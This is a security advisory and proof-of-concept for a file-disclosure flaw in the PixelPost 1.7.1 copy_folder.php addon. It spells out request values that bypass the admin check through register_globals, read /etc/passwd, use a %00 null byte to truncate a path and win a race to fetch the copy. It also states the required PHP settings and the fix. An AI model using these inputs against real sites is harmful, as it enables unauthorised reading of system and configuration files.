##
## PixelPost 1.7.1 File Disclosure
## by Charles "real" F. <charlesfol[at]hotmail.fr>
## [http://realn.free.fr]
##
## Requires register_globals = On (so $_COOKIE/$_GET/$_POST values are injected
## as globals) and magic_quotes_gpc = Off (so the %00 in the PoC is not escaped).
## The null-byte truncation used below additionally needs a PHP build without
## null-byte path protection (i.e. before 5.3.4). Both settings are deprecated
## in PHP 5.3 and removed in 5.4; disabling register_globals and initialising
## $files / $cfgrow before use closes this issue.
##
##
## PROOF OF CONCEPT
## ****************
##
## TARGET URL: http://[url]/addons/copy_folder.php?
##
## GETDATA=files[0]=/etc/passwd&cfgrow[password]=p4ssw0rd&cfgrow[timestamp]=0&cfgrow[imagepath]=file.txt%00
## POSTDATA=copyfolder=ok&folder_path=ok
## COOKDATA=_SESSION[pixelpost_admin]=p4ssw0rd
##
## Note: Simply loading http://[url]/addons/copy_folder.php with no parameters
## yields a full path disclosure (FPD). The absolute path is useful for
## targeting the configuration file, which lives at ./includes/pixelpost.php
## relative to the application root.
##
## EXPLANATIONS
## ************
##
## First of all, we have to bypass this authentication check (copy_folder.php, line 32):
##
C# 32. if(!isset($_SESSION["pixelpost_admin"])
C# . || $cfgrow['password'] != $_SESSION["pixelpost_admin"]
C# . || $_GET["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"]
C# . || $_POST["_SESSION"]["pixelpost_admin"] == $_SESSION["pixelpost_admin"])
C# . die ("Try another day!!");
##
## The author tries to prevent $_SESSION from being overwritten via $_GET and
## $_POST, but forgets that with register_globals = On, $_COOKIE values are
## "registered" as globals too. A cookie named _SESSION[pixelpost_admin]
## therefore populates $_SESSION["pixelpost_admin"] and is caught by neither of
## the two comparisons.
## To bypass the check we set the cookie _SESSION[pixelpost_admin]=p4ssw0rd
## and the GET parameter cfgrow[password]=p4ssw0rd (the $cfgrow array is
## presumably taken from register_globals as well, since the check is satisfied).
##
## At this point the script treats us as an authenticated admin.
##
C# 52. if($addon_handle = opendir($folder))
C# 53. {
C# 54. while (false !== ($file = readdir($addon_handle)))
C# 55. {
C# 56. if($file != "." && $file != ".." && $file != ".DS_Store")
C# 57. {
C# 58. $files[]=$file;
C# 59. $files_withdate[$counter]['filename'] = $file;
C# 60. $exifdate = copy_folder_get_exif_date($folder.$file);
C# 61. $files_withdate[$counter]['date'] = $exifdate;
C# 62. $counter++;
C# 63. } // end file !"."
C# 64. } // end while
C# 65. closedir($addon_handle);
C# 66. } // if addon_handle done
##
## The $folder variable cannot be controlled: it is fixed to '/'.
## However, the $files[] array is never initialised before the loop appends to
## it, so with register_globals a GET parameter such as files[0]=/etc/passwd
## seeds the array and lets us choose which file gets copied.
##
## Finally, at line 102, the file is actually copied:
##
C# 102. if(copy($file,$newpath))
##
## But it is not that simple:
## every entry of "/" is copied to THE SAME destination, file.txt, one after
## another. Because our entry is files[0], our chosen file is copied first and
## each following iteration may overwrite it, so we need good timing to grab
## the file before it is replaced.
## The destination $newpath is built from cfgrow[imagepath]; the trailing %00
## truncates whatever the script appends after it, so the copy lands at
## addons/file.txt.
## The sleep(1) executed on every iteration of the copy loop works in our
## favour: it gives a window of roughly one second after our file is written.
##
## Then we just need to fetch http://[url]/addons/file.txt within that window.
##
## POC
## ***
## A working exploit script is left to the reader.
## Because of the race described above, you will most likely need to send the
## request and poll for addons/file.txt concurrently (multiple threads). Have fun =)
##